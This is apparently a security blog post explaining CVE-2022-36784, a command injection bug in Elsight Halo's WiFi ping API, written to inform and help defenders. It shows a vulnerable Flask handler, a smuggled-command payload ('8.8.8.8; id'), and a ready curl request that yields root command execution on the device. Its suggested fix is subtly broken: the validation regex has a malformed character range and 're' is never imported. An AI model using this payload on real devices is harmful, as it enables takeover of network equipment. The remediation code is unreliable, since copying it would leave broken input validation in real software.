CVE CyberSecurity Database News

CVE-2022-36784 - Remote Code Execution in Elsight Halo’s WiFi Ping API Endpoint

Poster -

CVE-2022-36784 is a critical remote code execution (RCE) vulnerability affecting the Elsight Halo device—a popular product for secure data communication over cellular and WiFi networks (see Elsight’s official site for more on the product itself). If you manage networks or IoT deployments running these devices, or are interested in industrial cyber security, you’ll want to pay attention.

In this post, we’ll explain how a simple API feature in the Halo panel’s backend can let attackers run any command they want on the device, show you how the vulnerability works with code snippets, link you to the original advisories, and briefly discuss recommended fixes.

## The Vulnerability: Abusing the /ping API Call

Elsight Halo has a web panel for device administration. In that panel, you can check your WiFi connection by sending a POST request to this endpoint:

POST /api/v1/nics/wifi/wlan/ping

You send along a DESTINATION field that specifies what address (IP or hostname) to ping. Here’s where the problem lies.

The web backend code takes this user-supplied DESTINATION field and inserts it directly into an OS command, failing to sanitize the input. This is the classic “command injection” flaw.

Here’s a simplified version in Python representing how this might work on the backend

import os
from flask import request

@app.route("/api/v1/nics/wifi/wlan/ping", methods=["POST"])
def wifi_ping():
    data = request.get_json()
    destination = data.get("DESTINATION")
    # Unsafe: user input goes directly to an OS command!
    cmd = f"ping -c 4 {destination}"
    response = os.popen(cmd).read()
    return response

If you send in a regular IP, it runs the expected ping.
But—if you send in something malicious, you can trick it to run any command you like.

Exploit Details: From Ping to RCE

Because the backend runs something like ping -c 4 {DESTINATION}, what if we set the DESTINATION to this?

8.8.8.8; id

This will run

ping -c 4 8.8.8.8; id

The semicolon (;) tells the shell "run a second command." As a result, the output of id (which shows user info) is returned.

You could do much worse, like creating web shells, exfiltrating device data, or pivoting deeper into the network.

Here’s how you could exploit this using curl from a terminal

curl -X POST \
  http://<ELSIGHT_DEVICE_IP>/api/v1/nics/wifi/wlan/ping \
  -H 'Content-Type: application/json' \
  -d '{"DESTINATION": "8.8.8.8; id"}'

Response (simplified)

PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
...
uid=(root) gid=(root) groups=(root)

The last line (output from id) confirms code execution on the device as root.

Real-World Impact

- Any authenticated user (with access to the web panel) can run OS commands—no special permission needed.

Possible consequences: data theft, device bricking, network pivoting, malware installation.

- This is especially dangerous in sensitive environments like critical infrastructure, fleets, or anywhere Halo is used for secure comms.

References & Official Advisories

- Original CVE Entry: CVE-2022-36784
- SSD Labs Advisory: Elsight Halo RCE (SSD Advisory – SSD-2022-13008)

How to Fix

Mitigating this vulnerability relies on input sanitization and, better, avoiding shell invocation with user-supplied content. Here’s how you can properly fix it—using Python again for illustration:

import subprocess

@app.route("/api/v1/nics/wifi/wlan/ping", methods=["POST"])
def wifi_ping():
    data = request.get_json()
    destination = data.get("DESTINATION")
    # Validate input: allow only safe IPs/hostnames
    if not re.match(r'^[a-zA-Z-9\.\-]+$', destination):
        return "Invalid destination", 400
    # Use subprocess with a list (no shell=True)
    result = subprocess.run(["ping", "-c", "4", destination],
                            stdout=subprocess.PIPE)
    return result.stdout.decode()

Conclusion

This vulnerability is a textbook example of why input handling matters, especially in IoT or remote access devices. CVE-2022-36784 in Elsight Halo is simple to exploit, but just as simple to avoid with good coding and updates.

Check your Halo panel, apply firmware updates, and never trust user input in system commands.

Got more questions about this bug or secure devices? Check the SSD Research blog for deep dives, and always consult your device vendor for current patches.

Timeline

Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 18:17:00 UTC